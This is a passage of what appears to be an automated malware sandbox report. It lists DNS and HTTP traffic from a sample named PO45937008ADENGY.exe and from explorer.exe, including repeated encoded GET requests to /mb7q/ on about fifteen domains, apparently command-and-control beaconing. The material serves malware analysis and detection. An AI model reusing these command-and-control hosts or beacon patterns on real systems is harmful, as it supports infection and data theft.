                                                                                                    Apr 8, 2021 13:31:33.822031975 CEST6420653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:33.859922886 CEST53642068.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:39.644998074 CEST5090453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:39.678711891 CEST53509048.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:50.041105032 CEST5752553192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:50.089991093 CEST53575258.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:52.195184946 CEST5381453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:52.229252100 CEST53538148.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:53.995805979 CEST5341853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:54.021899939 CEST53534188.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:55.224247932 CEST6283353192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:55.571523905 CEST53628338.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:01.115739107 CEST5926053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:01.152175903 CEST53592608.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:06.329305887 CEST4994453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:06.359285116 CEST53499448.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:11.441346884 CEST6330053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:11.485353947 CEST53633008.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:16.629407883 CEST6144953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:16.664383888 CEST53614498.8.8.8192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    Apr 8, 2021 13:30:05.109535933 CEST192.168.2.48.8.8.80xe51dStandard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:30:05.314856052 CEST192.168.2.48.8.8.80x416eStandard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:01.450838089 CEST192.168.2.48.8.8.80xfd14Standard query (0)www.pradnyanamaya.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:06.643285990 CEST192.168.2.48.8.8.80xe68cStandard query (0)www.hepimizdostuz.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:11.974248886 CEST192.168.2.48.8.8.80x151aStandard query (0)www.hnchotels.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:17.383276939 CEST192.168.2.48.8.8.80x925cStandard query (0)www.bookitstaugustine.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:22.644455910 CEST192.168.2.48.8.8.80x93bdStandard query (0)www.beyju.storeA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:27.764228106 CEST192.168.2.48.8.8.80xd41fStandard query (0)www.szmsbk.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:33.822031975 CEST192.168.2.48.8.8.80x818bStandard query (0)www.accessibleageing.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:39.644998074 CEST192.168.2.48.8.8.80x7b27Standard query (0)www.theskineditco.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:50.041105032 CEST192.168.2.48.8.8.80x901aStandard query (0)www.thelandcle.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:55.224247932 CEST192.168.2.48.8.8.80x683aStandard query (0)www.tuyensinhhaiphong.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:01.115739107 CEST192.168.2.48.8.8.80xb9f0Standard query (0)www.merkuryindustries.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:06.329305887 CEST192.168.2.48.8.8.80x5ea4Standard query (0)www.belatopapparel.xyzA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:11.441346884 CEST192.168.2.48.8.8.80xbd6dStandard query (0)www.helpmewithmyenergy.comA (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:16.629407883 CEST192.168.2.48.8.8.80x4a28Standard query (0)www.softballlyfe.comA (IP address)IN (0x0001)

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    Apr 8, 2021 13:30:05.163789034 CEST8.8.8.8192.168.2.40xe51dNo error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:30:05.163789034 CEST8.8.8.8192.168.2.40xe51dNo error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:30:05.337465048 CEST8.8.8.8192.168.2.40x416eNo error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:30:05.337465048 CEST8.8.8.8192.168.2.40x416eNo error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:01.492580891 CEST8.8.8.8192.168.2.40xfd14No error (0)www.pradnyanamaya.compradnyanamaya.github.ioCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:01.492580891 CEST8.8.8.8192.168.2.40xfd14No error (0)pradnyanamaya.github.io185.199.108.153A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:01.492580891 CEST8.8.8.8192.168.2.40xfd14No error (0)pradnyanamaya.github.io185.199.109.153A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:01.492580891 CEST8.8.8.8192.168.2.40xfd14No error (0)pradnyanamaya.github.io185.199.110.153A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:01.492580891 CEST8.8.8.8192.168.2.40xfd14No error (0)pradnyanamaya.github.io185.199.111.153A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:06.752841949 CEST8.8.8.8192.168.2.40xe68cNo error (0)www.hepimizdostuz.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:06.752841949 CEST8.8.8.8192.168.2.40xe68cNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:12.117747068 CEST8.8.8.8192.168.2.40x151aNo error (0)www.hnchotels.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:12.117747068 CEST8.8.8.8192.168.2.40x151aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:12.117747068 CEST8.8.8.8192.168.2.40x151aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:12.117747068 CEST8.8.8.8192.168.2.40x151aNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:17.496551991 CEST8.8.8.8192.168.2.40x925cNo error (0)www.bookitstaugustine.combookitstaugustine.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:17.496551991 CEST8.8.8.8192.168.2.40x925cNo error (0)bookitstaugustine.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:22.701051950 CEST8.8.8.8192.168.2.40x93bdNo error (0)www.beyju.storeonstatic-pt.setupdns.netCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:22.701051950 CEST8.8.8.8192.168.2.40x93bdNo error (0)onstatic-pt.setupdns.net81.88.57.70A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:28.055814981 CEST8.8.8.8192.168.2.40xd41fNo error (0)www.szmsbk.com154.210.110.99A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:33.859922886 CEST8.8.8.8192.168.2.40x818bNo error (0)www.accessibleageing.comaccessibleageing.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:33.859922886 CEST8.8.8.8192.168.2.40x818bNo error (0)accessibleageing.com166.62.28.107A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:39.678711891 CEST8.8.8.8192.168.2.40x7b27No error (0)www.theskineditco.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:39.678711891 CEST8.8.8.8192.168.2.40x7b27No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:39.678711891 CEST8.8.8.8192.168.2.40x7b27No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:39.678711891 CEST8.8.8.8192.168.2.40x7b27No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:39.678711891 CEST8.8.8.8192.168.2.40x7b27No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:50.089991093 CEST8.8.8.8192.168.2.40x901aNo error (0)www.thelandcle.comthelandcle.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:50.089991093 CEST8.8.8.8192.168.2.40x901aNo error (0)thelandcle.com85.17.172.1A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:55.571523905 CEST8.8.8.8192.168.2.40x683aNo error (0)www.tuyensinhhaiphong.comtuyensinhhaiphong.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:31:55.571523905 CEST8.8.8.8192.168.2.40x683aNo error (0)tuyensinhhaiphong.com123.31.43.181A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:01.152175903 CEST8.8.8.8192.168.2.40xb9f0No error (0)www.merkuryindustries.commerkuryindustries.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:01.152175903 CEST8.8.8.8192.168.2.40xb9f0No error (0)merkuryindustries.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:06.359285116 CEST8.8.8.8192.168.2.40x5ea4No error (0)www.belatopapparel.xyz172.67.132.70A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:06.359285116 CEST8.8.8.8192.168.2.40x5ea4No error (0)www.belatopapparel.xyz104.21.4.167A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:11.485353947 CEST8.8.8.8192.168.2.40xbd6dNo error (0)www.helpmewithmyenergy.comhelpmewithmyenergy.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:11.485353947 CEST8.8.8.8192.168.2.40xbd6dNo error (0)helpmewithmyenergy.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:16.664383888 CEST8.8.8.8192.168.2.40x4a28No error (0)www.softballlyfe.comsoftballlyfe.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Apr 8, 2021 13:32:16.664383888 CEST8.8.8.8192.168.2.40x4a28No error (0)softballlyfe.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • myliverpoolnews.cf
                                                                                                    • www.pradnyanamaya.com
                                                                                                    • www.hepimizdostuz.com
                                                                                                    • www.hnchotels.com
                                                                                                    • www.bookitstaugustine.com
                                                                                                    • www.beyju.store
                                                                                                    • www.szmsbk.com
                                                                                                    • www.accessibleageing.com
                                                                                                    • www.theskineditco.com
                                                                                                    • www.thelandcle.com
                                                                                                    • www.tuyensinhhaiphong.com
                                                                                                    • www.merkuryindustries.com
                                                                                                    • www.belatopapparel.xyz
                                                                                                    • www.helpmewithmyenergy.com
                                                                                                    • www.softballlyfe.com

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    0192.168.2.449726172.67.150.21280C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:30:05.222027063 CEST752OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1
                                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                                    Host: myliverpoolnews.cf
                                                                                                    Connection: Keep-Alive
                                                                                                    Apr 8, 2021 13:30:05.302162886 CEST753INHTTP/1.1 301 Moved Permanently
                                                                                                    Date: Thu, 08 Apr 2021 11:30:05 GMT
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: max-age=3600
                                                                                                    Expires: Thu, 08 Apr 2021 12:30:05 GMT
                                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html
                                                                                                    cf-request-id: 0952d82f380000082c8c058000000001
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=T8Iq3E0fgv9XVgEL%2BW%2Fx6URbQDC2HOIVfFl4ypcGy0SMozUhsd64DoOdOuy3MOdT17Ds%2F7xqiJFljNxbOh2mcHUtqzzJjkYcM57UcdkLXF63gFk%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 63cb295ec9b4082c-CDG
                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    1192.168.2.449745185.199.108.15380C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:01.519802094 CEST2444OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1
                                                                                                    Host: www.pradnyanamaya.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:01.627937078 CEST2445INHTTP/1.1 301 Moved Permanently
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/html
                                                                                                    Location: https://www.pradnyanamaya.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ
                                                                                                    X-GitHub-Request-Id: 3480:11CCF:E7C81:10670B:606EE975
                                                                                                    Content-Length: 162
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Thu, 08 Apr 2021 11:31:01 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: cache-mxp6951-MXP
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1617881462.529324,VS0,VE92
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 1b888645c815d23ffbaaee603e3cc99ea950b580
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    10192.168.2.449771123.31.43.18180C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:55.836993933 CEST6414OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1
                                                                                                    Host: www.tuyensinhhaiphong.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:56.099909067 CEST6415INHTTP/1.1 301 Moved Permanently
                                                                                                    Date: Thu, 08 Apr 2021 11:31:55 GMT
                                                                                                    Server: Apache/2
                                                                                                    Location: https://www.tuyensinhhaiphong.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ
                                                                                                    Content-Length: 346
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 75 79 65 6e 73 69 6e 68 68 61 69 70 68 6f 6e 67 2e 63 6f 6d 2f 6d 62 37 71 2f 3f 31 62 68 74 61 36 3d 53 58 78 68 41 6e 30 58 6c 26 61 6d 70 3b 79 4e 36 30 49 5a 4f 30 3d 6c 30 75 54 72 48 67 45 34 64 58 32 43 57 36 4a 6d 31 31 6a 33 67 4b 38 59 2f 49 63 53 75 44 45 45 6c 59 57 67 4a 51 6b 6a 31 64 75 33 44 41 59 41 33 74 31 4f 41 6d 49 4a 75 37 79 43 46 69 39 43 73 6e 51 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.tuyensinhhaiphong.com/mb7q/?1bhta6=SXxhAn0Xl&amp;yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ">here</a>.</p></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    11192.168.2.44977234.102.136.18080C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:32:01.167972088 CEST6417OUTGET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.merkuryindustries.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:01.286478996 CEST6417INHTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:32:01 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
                                                                                                    ETag: "6063a886-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    12192.168.2.449773172.67.132.7080C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:32:06.389939070 CEST6418OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1
                                                                                                    Host: www.belatopapparel.xyz
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:06.432296991 CEST6419INHTTP/1.1 301 Moved Permanently
                                                                                                    Date: Thu, 08 Apr 2021 11:32:06 GMT
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=3600
                                                                                                    Expires: Thu, 08 Apr 2021 12:32:06 GMT
                                                                                                    Location: https://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ
                                                                                                    cf-request-id: 0952da08880000087b6e211000000001
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=295THSnQkzShTcX6%2BUaJWNC2pIbBYJXTNOypbgVOoL5zUmgUDp%2BEFEXYXVes3zRzyJyTirUEwdM3kaTvstmq%2BTK%2FDHqeLTXwT3EqYkJpD45OEk2rkKF6"}],"max_age":604800,"group":"cf-nel"}
                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 63cb2c540d12087b-CDG
                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    13192.168.2.44977434.102.136.18080C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:32:11.499423027 CEST6420OUTGET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.helpmewithmyenergy.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:11.618187904 CEST6421INHTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:32:11 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
                                                                                                    ETag: "606abe1d-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    14192.168.2.44977534.102.136.18080C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:32:16.678647041 CEST6422OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1
                                                                                                    Host: www.softballlyfe.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:16.857335091 CEST6422INHTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:32:16 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
                                                                                                    ETag: "606eb0f1-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
